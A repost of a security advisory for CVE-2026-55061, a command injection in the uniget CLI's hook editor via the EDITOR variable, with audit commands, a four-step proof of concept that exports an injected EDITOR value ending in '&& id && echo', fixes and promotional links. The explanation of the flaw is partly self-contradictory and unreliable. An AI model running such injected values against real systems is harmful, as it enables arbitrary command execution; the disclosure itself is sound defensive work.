Uniget CLI, Command Injection, CVE-2026-55061 (High) -DC-Aug2026-1545

Listen to this Post

The uniget CLI contains a command injection vulnerability in `hooks.go` at line 199, where the `strings.Split(editor, ” “)` function naively parses the `EDITOR` environment variable without respecting shell syntax. The vulnerable code extracts the `UNIGET_EDITOR` environment variable, falling back to `EDITOR` if the former is not set, and then splits the value on spaces to form the command and its arguments.
An attacker can set EDITOR="/path/to/wrapper && id && echo", which gets split into ["/path/to/wrapper", "&&", "id", "&&", "echo"]. Because `exec.Command` is called with these arguments directly, the shell operators (&&) are treated as separate arguments rather than shell syntax, but the wrapper script itself can be crafted to execute arbitrary commands. This was successfully exploited to execute uid=1000(w4nn4d13), confirming code execution is possible. The vulnerability affects hook editing and breaks configurations with modern editors like VSCode.

DailyCVE Form:

Platform: uniget-org/cli
Version: < 0.27.6
Vulnerability: Command Injection
Severity: High
Date: 2026-01-29

Prediction: 2026-05-08

What Undercode Say:

Analytics

Check uniget version
uniget version
Audit environment for vulnerable variables
env | grep -E "EDITOR|UNIGET_EDITOR"
Search for hooks that could trigger the vulnerability
find ~/.config/uniget/hooks -type f -name ".sh" 2>/dev/null

Exploit: (Educational Purposes!)

Step 1: Create malicious editor wrapper
mkdir -p /tmp/poc-editor
cat > /tmp/poc-editor/editor_wrapper.sh << 'EOF'
!/bin/bash
echo "[bash] Received args: $@"
id
EOF
chmod +x /tmp/poc-editor/editor_wrapper.sh
Step 2: Create test hook
mkdir -p ~/.config/uniget/hooks/pre-install
cat > ~/.config/uniget/hooks/pre-install/test.sh << 'EOF'
!/bin/bash
echo "Test hook"
EOF
chmod 700 ~/.config/uniget/hooks/pre-install/test.sh
Step 3: Set injection payload
export EDITOR="/tmp/poc-editor/editor_wrapper.sh && id && echo"
Step 4: Run vulnerable code
./uniget hooks edit --type=pre-install test.sh

Protection:

  • Upgrade to uniget CLI v0.27.6 or later
  • Avoid setting `EDITOR` or `UNIGET_EDITOR` to unsanitized user-supplied values
  • Use static editor paths without shell metacharacters
  • Apply the fix from commit `7b4f18a9f00f0955f830c7ccf266ed0de5f9fd91`

Impact:

Successful exploitation allows an attacker to execute arbitrary commands with the privileges of the user running uniget. This can lead to full system compromise, data exfiltration, or privilege escalation depending on the user’s permissions.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top